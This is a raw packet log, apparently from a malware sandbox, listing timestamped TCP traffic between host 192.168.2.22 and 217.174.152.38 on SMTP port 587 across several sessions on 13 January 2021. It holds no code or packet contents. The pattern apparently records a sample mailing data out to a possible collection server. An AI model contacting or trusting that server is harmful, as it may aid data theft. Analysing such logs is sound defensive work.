Jan 13, 2021 20:43:35.160832882 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:35.240246058 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:35.445916891 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:36.430715084 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:36.509646893 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:36.510322094 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:36.510447979 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:36.510482073 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:46.613147974 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:46.694503069 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:46.694636106 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:47.893498898 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:47.893995047 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:47.975651026 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:47.976128101 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.060558081 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.061144114 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.152923107 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.152981043 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.153022051 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.153090954 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.166631937 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.248908997 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.345238924 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.427052975 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.429451942 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.511307955 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.513128042 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.604473114 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.606214046 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.687967062 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.689261913 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.773444891 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.774669886 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.856482029 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.860069036 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.860424042 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.860713959 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.861404896 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.868377924 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.941351891 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.941371918 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.941538095 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.941642046 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.941693068 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:48.942437887 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.949625969 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:48.949775934 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.022890091 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.022933006 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.023081064 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.030956030 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.030981064 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.031061888 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.104563951 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.104623079 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.104651928 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.104701996 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.104743004 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.120325089 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.120368958 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.120522022 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.186032057 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.186057091 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.186075926 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.186094046 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.186120033 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.186172009 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.186197996 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.201809883 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.201832056 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.201920986 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.202003002 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.202061892 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.267687082 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.267723083 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.267748117 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.267772913 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.267807961 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.267893076 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.267961979 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.267988920 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.268783092 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.283438921 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.283479929 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.283504009 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.283538103 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.283611059 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.283688068 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.283716917 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.349296093 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.349328041 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.349348068 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.349365950 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.349422932 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.349806070 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.350338936 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.365746021 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.381566048 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.596431017 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:49.671190977 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:49.671442032 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:59.422152042 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:59.505821943 CET	587	49171	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:59.506095886 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:59.507379055 CET	49171	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:59.811018944 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:59.892126083 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:59.892249107 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.074893951 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.075277090 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.156693935 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.157043934 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.241065025 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.241677999 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.332906961 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.332972050 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.333036900 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.333170891 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.348140955 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.429801941 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.483833075 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.565234900 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.565918922 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.647356033 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.648360968 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.734456062 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.735196114 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.816854954 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.817684889 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.901747942 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.902404070 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.983880043 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:00.984792948 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.984818935 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.984921932 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.985064030 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:00.988902092 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.066194057 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.066236019 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.066301107 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.066346884 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.066379070 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.066751957 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.070040941 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.070122004 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.147835016 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.147897959 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.148133993 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.151387930 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.151439905 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.151633024 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.230037928 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.230093002 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.230134010 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.230299950 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.230331898 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.233963013 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.234040976 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.234078884 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.234169006 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.234198093 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.311870098 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.311908960 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.311949015 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.311994076 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.312196016 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.312247038 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.315452099 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.315520048 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.315557003 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.315614939 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.315638065 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.315735102 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.316135883 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.393781900 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.393831968 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.393883944 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.393918991 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.394035101 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.394149065 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.394177914 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.394215107 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.396744967 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.396879911 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.396917105 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.396986008 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.397136927 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.397424936 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.397517920 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.397666931 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.397880077 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.399518967 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.399739981 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.399811029 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.399888039 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.399967909 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:01.480935097 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.480966091 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.480983973 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.481023073 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.481223106 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.481427908 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.481456041 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.482110023 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.482135057 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.482170105 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.482665062 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.504806042 CET	587	49172	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:01.703015089 CET	49172	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.113471031 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.194787025 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.194938898 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.366298914 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.366606951 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.448107958 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.448534012 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.532612085 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.533415079 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.624876022 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.624928951 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.624963999 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.625106096 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.643065929 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.728729963 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.735622883 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.819884062 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.821053982 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.902937889 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.905201912 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:11.991297007 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:11.992530107 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.074126005 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.075552940 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.159598112 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.160813093 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.242244005 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.243760109 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.243987083 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.244260073 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.244537115 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.251501083 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.325146914 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.325175047 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.325220108 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.325436115 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.325437069 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.332653046 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.332854033 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.406824112 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.406850100 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.407056093 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.414356947 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.414382935 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.414530993 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.492463112 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.492758036 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.496143103 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.496174097 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.496210098 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.496424913 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.574208021 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.574238062 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.574263096 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.574287891 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.574306965 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.574350119 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.574368954 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.574397087 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.577573061 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.577651978 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.577672005 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.577744007 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.577764034 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.577805042 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.578264952 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.655877113 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.655905008 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.655940056 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.655968904 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.655997038 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.656013966 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.656029940 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.656047106 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.656166077 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.656635046 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.656924963 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.656991959 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.657102108 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.657187939 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:12.658895969 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.658931017 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.658961058 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.659097910 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.659368992 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.659542084 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.659629107 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.659734964 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.659948111 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.738909960 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.738944054 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.738967896 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.738991976 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.739025116 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.739054918 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.739936113 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.745830059 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:12.951648951 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:13.030900955 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:13.030987024 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:21.898663044 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:21.982682943 CET	587	49173	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:21.982784033 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:21.983694077 CET	49173	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.175492048 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.254103899 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.254204988 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.406984091 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.407346010 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.486284971 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.486655951 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.568134069 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.569046974 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.657474041 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.657507896 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.657529116 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.657669067 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.674978018 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.754316092 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.760818005 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.839792013 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.841015100 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:22.920408964 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:22.922095060 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.005353928 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.006628990 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.085585117 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.086775064 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.168154955 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.169265032 CET	49174	587	192.168.2.22	217.174.152.38
